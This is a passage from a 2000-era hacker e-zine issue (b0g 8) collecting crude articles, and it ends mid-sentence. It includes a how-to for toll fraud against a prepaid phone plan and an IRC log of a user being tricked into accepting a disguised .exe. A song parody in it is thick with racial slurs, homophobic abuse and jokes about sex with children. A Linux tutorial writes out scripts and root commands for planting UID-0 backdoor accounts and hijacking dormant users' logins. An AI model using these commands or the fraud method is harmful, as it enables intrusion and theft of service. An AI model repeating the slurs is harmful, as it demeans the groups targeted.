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[b0g-8.txt] [ 0:. - [ ] :. ] [ 1:. - [ Bill Gates is Satan ] [data] :. ] [ 2:. - [ How to get out of jury duty ] [mike jasper] :. ] [ 3:. - [ Rogers/AT&T Pay-As-You-Go Billing Vulnerability ] [tc] :. ] [ 4:. - [ The Real Prae ] [Prae] :. ] [ 5:. - [ Reactions to the 2600 ruling ] [ripped_edge] :. ] [ 6:. - [ Funniest IRC log ever ] [chris] :. ] [ 7:. - [ /etc/passwd and /etc/shadow in Linux ] [magictux] :. ] [ 8:. - [ Counter Hacker Profiling ] [ripped_edge] :. ] [ 9:. - [ rap Vs the viruscoders part 2! ] [evul] :. ] [10:. - [ The ultimate guide to marihuana ] [wh0rde] :. ] [11:. - [ A fistful of bombs ] [d[a]wg] :. ] [12:. - [ Owning the universe ] [tak] :. ] [13:. - [ Why RLoxley Is My Favorite Person On Earth] [acidkick] :. ] [14:. - [ How to tell if your best friend is a wigger ] [zeddy] :. ] [15:. - [ How to start a Pub Ruck ] [bruk0ut] :. ] [16:. - [ Fun Cannabis Related Tools ] [trionix] :. ] [17:. - [ Mailbag ] [k-rad-bob] :. ] [18:. - [ warez, exploits and 0day code ] [various gimps] :. ] [19:. - [ IRC Quotes ] [k-rad-bob] :. ] [20:. - [ closing words ] [k-rad-bob] :. ] [ ] ____________________________________________________________________ get your b0g at: http://www.b0g.org - official site! http://packetstorm.securify.com/mag/b0g/ send your submissions to b0g@b0g.org ! gibb0r us your articles! send us anything >:/ send nudies, pics, and any cool stuff you can think of to k-rad-bob@b0g.org b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! ____________________________________________________________________ [ 1:. - [ Bill Gates is Satan ] [data] :. ] [s3v3n-27@antionline.org] :. ] ____________________________________________________________________ Do you know that Bill Gates' real name is William Henry Gates III? If so, who gives a fuck, but he is known as Bill Gates (III) where III means the order of third, duh! So what's so weird about this name? OK, if you take all the letters in Bill Gates III and then convert it into ASCII and then add up all the numbers.... You will get 666. "Really? How do you know?"...Shut the fuck up and I�ll tell you B = 66 I = 73 L = 76 L = 76 G = 71 A = 65 T = 84 E = 69 S = 83 I = 1 I = 1 I = 1 Add these numbers and they equal 666(you can use pen or paper but I use the calculator on my computer cause I don't know how to add)Coincidence? Maybe, but take Windows 95 and do the same procedure and you will get 666. Still think it is coincidence? then your a dumb fuck. Okay, now for the good part. For those of you who still have the old Excel 95 try this out: 1. Open a new file 2. Scroll down to row 95 3. Click on the row 95 button to highlight the entire row 4. Press tab to move to the second column 5. Now, move your mouse and click on Help at the top 6. Then click on "About Microsoft Excel" 7. Press Ctrl-Alt-Shift and click on the tech support button at the same time 8. a window will appear with the title: THE HALL OF TORTURED SOULS It has a doom style format and you can walk all around the hall using the arrow keys. And on the sides of the walls are the names of the tortured souls... Now walk up the stairs and then come back down, facing the blank wall. Now type in EXCELKFA this will open the blank wall to reveal another secret passage, walk through the passage and do not fall off. This is difficult to do. When you get to the end, you will see something really, weird. It could be a joke by MS programmers. Or is it? I don't know god dammit, don't ask me. b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! ____________________________________________________________________ [ 2:. - [ How to get out of jury duty ] [mike jasper] :. ] [jasper@mikejasper.com] :. ] ____________________________________________________________________ "State your name and jury number please." "Ahhh... Mike Jasper. And I'm not sure what my jury number is. I heard 190- something, but I was thinking it was 162. I'm not real sure." I had just hit a home run, a towering Mark McGwire shot in the upper decks. The judge, the bailiff and the lawyers all looked at me with the same collective thought: This fucker's too stupid to be on the jury. And he might be high. "Why you want to get out of jury duty for?" my comedian friend Mary C. asked me the next day. "You don�t want to be part of process of great system of justice in great country of America?" Hmmm. I hadn't thought about it that way before. But it's true: I don't want to be part of the process of the great system of justice in this great country of America. Why? Because I don't believe in the judicial system. Let me clarify: I believe it exists. I also believe it provides the best justice money can buy. But I don't believe 12 people selected randomly from a segment of the population too stupid to get out of jury duty can be expected to wade through incantations of legal voodoo and render the right decision. With the exception of the OJ trial, of course. He was clearly innocent. But I digress. I promised to tell you how to get out of jury duty and I plan to deliver on that promise: How To Get Out of Jury Duty 1) Dress for success. While few courts require you to wear a suit, most expressly forbid shorts or cut-offs, tee-shirts, tank tops or other so-called muscle shirts. Jeans are okay, provided they aren't torn or patched. Penny loafers rock. In other words, it's the exact same dress code required by the Yellow Rose, a local Austin titty bar. Truth is, you can easily meet the court's dress code requirements and still create a repulsive image. All it takes is a little imagination. Think costume. On my appointed court date, I decided to go as a 70s rock star. (Note: Whenever possible, draw from your own experience.) I wore black slacks and black cowboy boots, a teal silk shirt unbuttoned one more button than good breeding would normally dictate, and the piece de resistance -- a full- length black trench coat. Unfortunately, I couldn't find my old shark-tooth necklace, which would have been the perfect accessory. My hair wasn't as long as I would have liked either, but I managed to spike it up pretty convincingly with a blow dryer. The beard played to type and the shades -- although not allowed in the courtroom -- added penache to my entrances and exits. 2) Choose your smell and stick to it. There is nothing in the dress code about personal hygiene, likely because the courts don't want to consider the ugly possibilities. I prefer the persistent smell of cigarette smoke, but then I'm a cigarette smoker (Again: Draw from your own experience). Every time I left the building for a cigarette break, I forced myself to smoke two butts: one for me, one for my clothes. Not only did this help me get out of jury duty, it assured me more elbow room in court. You might prefer another scent, perhaps a natural one. If so, don't take a shower for several days before your appointed court date. Not only will you get out of jury duty, you might be excused early. Others may choose to employ a noxious aftershave or perfume. If so, I suggest you splash it on thick before leaving the house and carry around a bottle in your pocket for convenient booster applications. This I guarantee: no one will ever question you about your smell. No one would dare take that kind of initiative. As a rule, all workplace decisions are made by committee. Short straw loses. 3) No matter what your occupation, fit the words "newspaper reporter" somewhere in your jury form. All courts require potential jurors to fill out a form. If you're a full- time parent, a felon or certifiably insane, you'll be able to check the appropriate box and get out of jury duty without having to attend so much as a single day in court. Why? Because if you're a full-time parent, a felon or certifiably insane, you're much more likely to smell (I'm telling you, they just hate that). Assuming you're not one of the above, find the place on the form where you're asked to name your occupation. In that space, write the following: "I am currently a (Your Occupation), but I plan to become a NEWSPAPER REPORTER in the very near future." Here's the deal: When you're on a jury, you are not allowed to discuss the case outside the courtroom. But once the jury's released, you can write for daylight. You can be colorful and describe how the defense lawyer spilled coffee on his trousers just minutes before his summation. Officers of the court know what reporters do. And they hate what reporters do. I hope anyone trying to get out of jury duty will consider my advice, for I can absolutely guarantee with Joe Namath-like certainty that my little three-point system will work every time. Unless, of course, you live in the state of California, in which case you're fucked, since the Golden State has recently passed laws against smelling, changing jobs, shark-tooth necklaces, smoking, aftershave use, the wearing of trench coats, and the writing of web pages offering advice on how to get out of jury duty. Copyright 2000 by Mike Jasper [note from editor: for more articles/rants from this guy check out http://www.mikejasper.com ] b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! ____________________________________________________________________ [ 3:. - [ Rogers/AT&T Pay-As-You-Go Billing Vulnerability ] [tc] :. ] [theclone@b0g.org] :. ] ____________________________________________________________________ Advisory released: Tuesday August 29, 2000 Severity: Pay-As-You-Go billing vulnerability on the part of Rogers/AT&T allowing anyone (especially YOU!) to exploit it and make local/national/international calls for free. Author: The Clone -- Disclaimer; I don't take responsibility for anything in this file because an Iranian terrorist group known as 'habakkkoktao' has held me at gun point requesting that I write this or they're going to shoot me. Don't blame me, blame them! Introduction; Rogers/AT&T (Canada) offers to its customers, a particular service plan known as the "ROGERS/AT&T Pay-As-You-Go Wireless Plan". This "plan" entitles you to full local, national, and international wireless service within the coverage areas that it offers (see www.rogers.ca for coverage info). In order to make use of the pre-paid wireless service, you must firstly sign up by: 1. Dialing one of the following toll-free numbers from a landline phone; (Between 8:00am-9:00pm weekly, 8:00am-6:00pm Saturdays and holidays) 1-800-663-1415 - British Columbia, Alberta, Saskatchewan, Manitoba 1-800-268-7347 - Ontario 1-800-361-0538 (1-800-ROGERS AT&T) - Quebec, New Brunswick, Nova Scotia, Prince Edward Island, Newfoundland OR 2. Walk into any Rogers/AT&T store or certified dealership and sign up there. Want to order over the phone or need help finding the nearest dealership? Call: 1-888-448-7994 OR 3. Buy 'Pay-As-You-Go' online: http://www.rogers.ca/wireless/english/voice/pay/buy/index.html Pre-Paid Cards; By going to any Rogers/AT&T wireless store location, you can pick yourself up one of many different Pay-As-You-Go cards. What I usually buy are the $25 1-hour cards because they're cheap and I'm not really huge on talking on tumor causing insecure radio transmitter/receivers. Activating your Card; After purchasing your pre-paid card, what you can do is call up one of the INWATS number listed above (from a landline) that services your local area and speak to one of the friendly customer service representative who'll be MORE than happy to help you out. Tell them that you just purchased a pre-paid card and that you'd like them to renew the time to your phone. Re-filling your time; Either buy another Pay-As-You-Go card from a Rogers/AT&T dealership, call them up and pay with your credit card, OR see step 3 [above]. -- The Vulnerability - as a scenario. - Johnny picks up his wireless Rogers/AT&T pre-paid phone and turns it on - Johnny hears a beep, looks at his phone and notices that he has a lot of battery power left - Johnny feels glee and lets out a huge *sigh* - Johnny then proceeds to dial his boyfriend Frank's phone number - Johnny prepares to listen to the beautifully sounding automated female recording (that makes him for a moment in his very homosexual life want to be heterosexual just so he'd know what it was like to actually lust for such an angelic voice) read off the number of minutes he has left for his call (account balance). - Too bad for Johnny; no automated voice at all! "What duth dith mean?" lisps the very gay, confused, and curious Johnny. Well Johnny, what just occurred was simple; The Rogers/AT&T's Pay-As-You-Go billing system didn't recognize your account, therefore you weren't billed for that particular call. Each time the automated voice plays, you're billed for the call - each time it doesn't, you aren't. I've estimated (with my personal experience) that the billing errors occur approximately 40% of the time while 60% of the time the billing goes through absolutely fine. One could easily exploit this vulnerability by; Hanging up the call every time the automated voice appears on the phone, re-dialing the desired number and repeating the process until the automated voice doesn't appear. Simply only pay for one $25 Pay-As-You-Go card and keep exploiting the Rogers/AT&T system, calling any number you wish in the world for absolutely free! No one gets billed, no one is hurt. Leech off the capitalist pigs while you still can! -END- b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! ____________________________________________________________________ [ 4:. - [ The Real Prae ] [Prae] :. ] [prae@b0g.org] :. ] ____________________________________________________________________ May I have your attention please? May I have your attention please? Will the real Prae please stand up? I repeat, Will the real Prae please stand up? We're gonna have a problem here.. Ya'll act like ya've never seen a 40 year old virgin before, Jaws all on the floor like bronc, like jericho just burst in the door and started whippin' his ass worse than before. they first were divorce. throwin' him over furniture. (AAAHHH!). It's the return of the "Ah wait, no way,you're kidding. he didn't just touch my penis did he?". And Vegtam said... NOTHING YOU IDIOTS! VEGTAM'S DEAD HE'S LOCKED IN K-RAD-BOB'S BASEMENT! Feminist lesbians love RLoxley "h0h0h0, I'm sick of him, look at him walking around grabbin' his you-know-what, wavin' it at those poor little kids" - "Yeah, but he's so gay though." Yeah he's probably got a couple o' cobwebs in his underpants but no worse than whats going on in his bedroom (*orgasm*). Sometimes he just wants to get on usenet and just let loose, but can't. But it's cool for JP to hump a fat slut. My bum is on his lips! My bum is on his lips! And if I'm lucky he might just give it a little kiss. And thats the message that he delievers to the kids in #hackphreak and expects them not to know what winnuke.c is. Of course they're gonna know what homosexuality is, by the time they meet Accipiter they've been assfucked ten times, haven't they?. We ain't nothing but mammals, Well some of us faggots who suck other guys' dicks for fun. But if we can hump 7 to 12 year olds then there's no reason why bronc and jericho cant elope. But if you feel like I feel with my 18 incher. Women, wave your pantyhose. Sing the chorus and it goes.. I'm Prae, and I don't like niggers one bit. All you other Prae's are just imatatin' So wont the real Prae please stand up, please stand up, please stand up? [sing it twice] BobsKC don't gotta cuss to get his point across, well I do, so fuck him and fuck you too! You think I give a fuck about DEFcon? half of you lamers cant even stomach me, let alone stand me. "But we want you to come, Prae!" Why? So you guys can just lie, to get me here and sit me here next to viXen900? (EWWW!). Cass better switch me chairs so I can sit next to k-rad-bob and twist an hear em' argue over who she gave head to first. Little bitch, fuckin' me around. "Oh, you're so sweet, Prae. hee-hee." I should post her naked pics on the b0g BBS and show the whole world how you gave Prae VD! I'm sick of you fuckin' scene whores, all you do is annoy me, so I have been sent here to fucking kill you. And there's a million of us just like me, who cuss like me and just dont give a fuck like me, dress like me, walk, talk and act like me. It just might be the next best thing but not quite me! I'm Prae, and I don't like niggers one bit. All you other Prae's are just imatatin' So wont the real Prae please stand up, please stand up, please stand up? [sing it twice] I'm like a head trip to listen to, cause I'm only givin' you things you joke about with your friends in your /msg window, the only difference is I got the balls to say in front of ya'll and I don't gotta be false or sugar coated at all, I just sit at my term and spit it and wether you like to admit it, i just shit it better then 90% of you faggots out there. And you wonder why these kids look up to me? It's funny, cause at the rate im goin'. When I'm 30 I'll be the only person in the nursin' home flirtin', pinchin' nurses asses when im jackin' off with jergens and im jerkin' but this whole bag of viagra isn't workin'. And every single person is a Prae lurkin'. he could be working at Burger King spittin' on yo onion rings, or in the parkin' lot circlin', screamin' "i dont give a fuck!" with his windows down and his system up! So will the real Prae please stand up and stick one of those fingers on each hand up (RLoxley's ass!). And be proud to be outta yo' mind and outta control, one more time, loud as you can, how does it go? I'm Prae, and I don't like niggers one bit. All you other Prae's are just imatatin' So wont the real Prae please stand up, please stand up, please stand up? [sing it 4 times] Haha, I guess there's a Prae in all of us. Fuck it. Lets all stand up. b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! ____________________________________________________________________ [ 5:. - [ Reactions to the 2600 ruling ] [ripped_edge] :. ] [Ripped_edge@hotmail.com] :. ] ____________________________________________________________________ MPAA legal team: �Well this is obviously a huge victory for consumers world wide. The movie industry is now free to continue its monopoly of digital storage for film.� (Ummmm� right.) The script kiddies: �It�s all over man. This is just the beginning; next they'll be raiden our houses man. I gotta go man, my friends and I are gonna smurf the MPAA web site dude.� (Good thought, that way the hoards of people who want to visit the MPAA web site at 2:30 in the morning won�t be able to.) The web designer: �Huh? Why do DVD�s have cascading style sheets on them anyway? And why would you wanna take them off?� (Now see these guys are smart, make web sites get rich, what the heck am I doing looking for 0day exploits in openBSD, I�m gonna be a web designer, that�s where the cash is!) The guy off the street: �What the heck�s a 2600? DeCSS what�s that? I ain�t got time for no mind games mister, I�m already late, outta my way.� (*Sigh*) The leet0 hacker: �Who cares? It�ll take me five minutes to write my own ripper for DVD�s, I could care less.� (I like this guy) The sysadmin: �Dang script kiddies, hope they rot in jail. Who cares? I can still find it all over the web.� (2600? Script kiddies? Hmmm� interesting thought) The 2600 legal team: �It sets a dangerous precedent.� (That it does) Me: I really don�t see a down side to this whole deal. If 2600 wins on appeal, then the MPAA looks stupid and 2600 keeps on mirroring. If 2600 loses then the MPAA looks like an ogre and a whole bunch of other sites take up the mirrors. (Its already starting, I noticed a slight increase in the number of sites that showed up in search engine searches for DeCSS mirrors) Congrats MPAA, you just started a grass roots revolution dedicated to spreading DeCSS all over. And I really wanna see them enforce us law in Pakistan or something. 2600 can win or lose, the MPAA can�t win. b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! ____________________________________________________________________ [ 6:. - [ Funniest IRC log ever ] [chris] :. ] [chris@b0g.org] :. ] ____________________________________________________________________ chris /part all chans you are on plz i'll try to help you in private until i find a help chan that can help you #help #hacktech #b0g - Crowley is bos77@ts1-092.mtrl.ca.ziplink.net * 12question spring-spring: comment fait-on pour av Crowley on #AVU #AntiVirus #irc_help #protectors #mIRC @#firewall #help Crowley using seattle.wa.us.undernet.org the time for school is during a recession. Crowley End of /WHOIS list. - #help #b0g you really don't give a fuck do you?? ? well forget that i tried to help you iim not in any channels you don't even answer when i write..and i hate ah now you ain't ok gimme a minute..will you stay put? you must forgive, i not english what's your mother tongue? nicaraguan ok we'll stick with english, i'm a french canadian, i don't think you know french? no no no frecnh ok then. give me a minute *Prae* You are infected with the Chernobyl virus! Please give me your passwords so I can help you! what is this? - Prae is ~Prae@dialup164.fawlty.kingston-internet.net * FREE RLOXLEY! Prae on #unix #b0g Prae using Baltimore.MD.US.Undernet.Org ABSnet's Undernet Server Prae has been idle 59mins 42secs, signed on Sat Aug 26 22:33:44 prae End of /WHOIS list. - forget that!! a person named prae sent you that msg? i found a cure on internet...forget everything that prae will say to you -Prae- DCC virusclear.txt.exe ( forget it........ i'm telling you i found something and you will go and get it by yourself not trust some1 you don't even know... where to get this ignore/cancel any send that this prae might send you even if he's maybe a good guy... I not know him. IRCops say he bad man http://www.symantec.com/avcenter/kill_cih.html click on KILL_CIH (on the 1st line, the 2nd word) is everything ok? did you download it? No! Prae say no trust anymore! ???? what's the problem here?? did you go on my address on internet? http://www.symantec.com/avcenter/kill_cih.html symantec.com is a hacker site! if you download things from there you will get your computer hacked! click on KILL_CIH (on the 1st line, the 2nd word) arg.........come on!!! symantec is renowned for helping people who have viruses! what is this renowned? it means every one knows that symantec is great for helping people who have viruses he's lying. Don't trust him. Accept my file. trust me please...i wouldn't spend so much time with you if that was not the case arg............ok do whatever you want to do...you'll probably accept a virus if he's so bad...to say that symantec is a hacker site proves that the guy must be a hacker/nuker... my mouse stopped working!! help1!%@# i give up, whether you're laughing at me, or you're an idiot to trust this prae...go and hang yourself if you don't believe me i cannot get to internet with mouse broken! -Crowley- DCC Send cure_cih.exe ( *** You cancelled the DCC (cure_cih.exe) from Crowley. accept this that's the only way you'll kill this virus if you don't accept it, forget that you talked to me penis. -Crowley- DCC Send cure_cih.exe ( *** You cancelled the DCC (cure_cih.exe) from Crowley. ??? you accept it or you don't your choice penis! ok bye i tried hi crowley! this is prae! hahaa thanks for helping him! rofl! i HACKED him! hahaha help hHAHAHA ! what is thati?! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! ____________________________________________________________________ [ 7:. - [ /etc/passwd and /etc/shadow in Linux ] [magictux] :. ] [magic.tux@gmx.net] :. ] ____________________________________________________________________ First of all, I'd like to say that if this article turns out weird, forgive me. I'm writing this at 3 AM. (I know, that's what everyone says, but it's true! ;) ) Oh, and I'm writing this in Pico!!! Muahaha, Pico 0wnz ........ along with b0g of course. I tried to be funny, but I really lack a sense of humor, so just pretend to laugh .... please?! And if you're wondering why all the progs here are in /bin/sh and not in C. It's because shell-scripting is so much faster than writing some fucked up C programs ... and I am tired. Oh, and sorry but I suck too bad to make any neat ascii art. Table Of Contents ================= I.) Introduction II.) Explanation of /etc/passwd III.) Explanation of /etc/shadow IV.) The Fun Part: H4x0ring /etc/passwd and /etc/shadow V.) Conclusion VI.) b0g 0wnz Program! ================ I.) Introduction ================ Since you're a really leeto H4x0r (right?!) you've heard of this thing called Linux. If you're uberleet you might have even heard of Unix, *BSD, Irix, Minix, Xenix ... Well if you haven't, let's pretend you have, cause we wouldn't want to ruin your l33t0 H4x0r 1m4g3. Since you've heard of Linux (!), you've also heard of this file called /etc/passwd and another file called /etc/shadow. You know that you need those philes for your leeto h4x0ring. Riiiight. So why do you need those files for your leeto h4x0ring?? It's quite simple: Cause you do!! Now that that's clear, let's proceed to II.) II.) Explanation of /etc/passwd The /etc/passwd file is the file that contains information about all the users on the system (including their password, unless it is shadowed ... but we'll get into that later). So let's take a look at an example /etc/passwd file. Let's take mine ... no! Just kidding, freaks! It is usually world-readable. If you don't know what that means, well, then you're not leet! Here it is: root:lECN8annvOh/M:0:0:Rewt,Rewt Office,1-800-GAY-SEX,1-800-WITH- DOGS:/root:/bin/bash The first part (you know, the one that says root) is the login of the person. This dude's login is root, if you're really leeto you know what that means, eh? The second part is his DES-encrypted password. Everytime you enter your pass at the login it gets encrypted with DES and compared to the one in the /etc/passwd (or /etc/shadow) file. It's 'mypassux' by the way. How I know? Cause I'm the one that created his pass. But you might have just run something like John The Ripper over it ... since you're leet. Newbie Note: BSD uses blowfish for encrypting passwords. The third part is the GECOS information. GECOS means General Electric Comprehensive Operating System if you must know. Let's finger root (no, not in the perverted way) to seen an example of the GECOS information. $ finger root (I'm not using the '#' prompt, because I don't think you're leet enough) Login: root Name: Rewt Directory: /root Shell: /bin/bash Office: Rewt Office, 1-800-GAY-SEX Home Phone: 1-800-WITH-DOGS On since Wed Aug 23 19:20 (CEST) on tty2, idle 6:39 No Mail. No Plan. Ok, what does this tell us? The first GECOS field is the Name, the second one is the Office, the third one is the Office phone and the fourth one is the Home Phone. Also it tells us that Rewt is quite gay and fucks dogs ];->. The fourth part is the UID (User ID). User root (that's the sysadmin) _always_ (unless some mindless prick changed it) has UID 0. The lower your UID the more permissions you have. The 'normal user' UIDs usually start at 500. The fifth part is the GID (Group ID). See above. The sixth part is the leeto home directory root 0wnz. In this case it's /root. Well, it usually is. Normal users will probably have something like /home/mycrappyloginname. But root rulez the system so he gets a homedir ascending right from the root-directory ('/'). The seventh part is the shell the user uses. Root is leet so he goes around bashing people up ... In other words, he uses the leat bourne again shell /bin/bash. A normal user might be using /dev/null ^H^H^H^H^H^H^H^H^H^H ];-> /bin/sh, /bin/bash (yes, normal users can be leet), /bin/csh, /bin/tcsh, /bin/zsh ... So basically the format for a /etc/passwd entry would be: login:encrypted-password:UID:GID:name, office, office phone, home phone:home-dir:shell Now try out my leeto adduser program ----Begin copy here----addleetouser.sh---by MagicTux---- #!/bin/sh if id | grep root then echo "Enter Login" read vlogin echo "Enter UID" read vuid echo "Enter GID" read vgid echo "Enter Gecos information (name, office, office phone, home phone) separated by commas" read vgecos echo "Enter Home Directory" read vhome echo "Enter Shell" read vshell echo echo "Creating account ..." echo "$vlogin::$vuid:$vgid:$vgecos:$vhome:$vshell" >> /etc/passwd echo "Finished" else echo "You have to run this program as root, you totally fucked up Lamer!" fi exit 0 --------Ok, you can stop copying now-------------------- So, what does this leeto program do? It lets you create a user without a password. So, next you login with that user (you won't be asked for a password). Then you type the command 'passwd' to create a password. Why? Because you don't want other leeto H4x0rs to use your account. Got that? Ok, then move along to III.) (fuck, I'm good with these Roman(or was it Greek?) numerals ;) ) ================================ III.) Explanation of /etc/shadow ================================ Now that you're leet (well, sort of) and know what /etc/passwd is, you can learn what the /etc/shadow file is. Nowadays, most systems fortunately/unfortunately use a technique called shadowing. This 'shadowing'-technique creates a file called /etc/shadow. This file is not world readable or anything. This /etc/shadow file contains the encrypted password. So, let's take a look at an example (I love examples!) Here's the /etc/passwd file now with shadowing root:*:0:0:Rewt, Rewt Office, 1-800-GAY-SEX, 1-800-WITH- DOGS:/root:/bin/bash What difference to the previous /etc/passwd file do we notice? None. Wrong! Now instead of the encrypted pass there's a '*'. Now don't go and try logging in as root with the pass '*'. That's not leet (and it won't work anyway). So now you wonder where the encrypted pass went? This is where the /etc/shadow file comes in. Here's the /etc/shadow file with shadowing (DUH!) root:lECN8annvOh/M::::: So what does that mean? It means that root's encrypted pass is stored in the /etc/shadow file, which is not world-readable (unless the sysadmin is totally fucked up). This meaning, that you have to be root to be able to see the encrypted pass. Well? Get root!!! So, now let's edit addleetouser.sh so it works with shadowing. Newbie note: If you don't make an entry in the /etc/shadow file, your newly created pass will be put in /etc/passwd. ----Begin copy here----addleetouserwithshadowing.sh---by MagicTux---- #!/bin/sh if id | grep root then echo "Enter Login" read vlogin echo "Enter UID" read vuid echo "Enter GID" read vgid echo "Enter Gecos information (name, office, office phone, home phone) separated by commas" read vgecos echo "Enter Home Directory" read vhome echo "Enter Shell" read vshell echo echo "Creating account ..." echo "$vlogin:*:$vuid:$vgid:$vgecos:$vhome:$vshell" >> /etc/passwd echo "$vlogin::::::" >> /etc/shadow echo "Finished" else echo "You have to run this program as root, you totally fucked up Lamer!" fi exit 0 --------Ok, you can stop copying now-------------------- So, if you're leet enough to understand this, you might have noticed that we only added one line. Not that complicated, eh? Well maybe for you ... but, you know what I mean. If you're even leeter, you might have even noticed that the line added was 'echo "$vlogin::::::" >> /etc/shadow. See explanation for this above, or figure it out yourself. Well, and we added a * in the echo "$vlogin:*:$vuid:$vgid:$vgecos:$vhome:$vshell" >> /etc/passwd command, but that doesn't count ;). Now that you understand all of this stuff with /etc/passwd and /etc/shadow you can move your eyes down a bit and read part IV.) (If you didn't understand anything, beat yourself up and reread this far until you've got it all down.) ======================================================= IV.) The Fun Part: H4x0ring /etc/passwd and /etc/shadow ======================================================= So, now that you've learned all sorts of weird shit and stuff about /etc/passwd and /etc/shadow you wanna find a neat use for them. I don't suppose, you could be creative and come up with something on your own, so I'll give you some hints and ideas on what you could do. Well, let's start out with something scary like 'The Login Backdoor' since you wanna keep root once you've got it, cause you're a lame script kiddie. If this sounds scary to you, go jerk off under your blanket and you'll feel better. Then come back and finish reading this article. So what exactly is a login backdoor? Actually if you're asking this question and still haven't come up with a creative answer on your own, you're quite stupid. But I'll tell you anyway: A login backdoor is simply where you create a new account of your own, by typing something like this: # echo 'magictux:*:0:0:MagicTux, 0wnz, This, b0x:/magictux:/bin/bash' >> /etc/passwd ok, 2 things about this command: a) I'm using the '#' prompt, because I'm leet enough ];-> and because I need to be root to execute that command anyway. Now we execute this uberleeto command: # echo 'magictux::::::' >> /etc/shadow Notice once again the leeto '#' prompt. Also notice, that instead of typing these stupid commands you could just run the leeto addleetouserwithshadowing.sh script. But that probably isn't leeto enough for you! Well, let's continue with our leeto commands: # su magictux # passwd Yep, we now have installed our login backdoor successfully. We can now telnet or whatever to our 0wned box and login with our login backdoor username and the password we just made with that leet passwd command. Now we can all make bets on how long it's gonna take the sysadmin to notice someone added a leeto account and hope we might actually get in once more before getting busted by the FBI ... A less obvious login backdoor would be to check, which users haven't logged in for a while (no, not like 3 minutes, more like a few months). Then we can assume that they probably will never log in again, or think they forgot their password when they do try. How we'd do this is, get a list of all logins, then finger them (no, not the perverted way again; I know this is getting boring, since you're all horny from reading all this leet stuff) and check when they last logged in. If it's a good while back, we'd edit the /etc/shadow file (or /etc/passwd, if shadowing is disabled (which is very unlikely)) and delete the password of that user. Thus enabling us to type the passwd command and create a new one for them. It might look something like this: # cat /etc/passwd # finger bob (one of those thousand users) Last logged in: Quite a while ago # bingo bash: bingo: command not found # pico /etc/shadow (yes we use pico, because pico 0wnz!!) ^W bob bob:abjkle3cjoij3o::::: and we change that line to bob:::::: ^X y Congratulations! You stupid ass fuck have just set up an even leeter than the previous login backdoor. I know that example above was very bad, but it's getting late and I'm getting all weird. Ok, now be creative and write a bunch of cool backdoors and exploits and trojans and lotsa other leeto stuff with /etc/passwd and 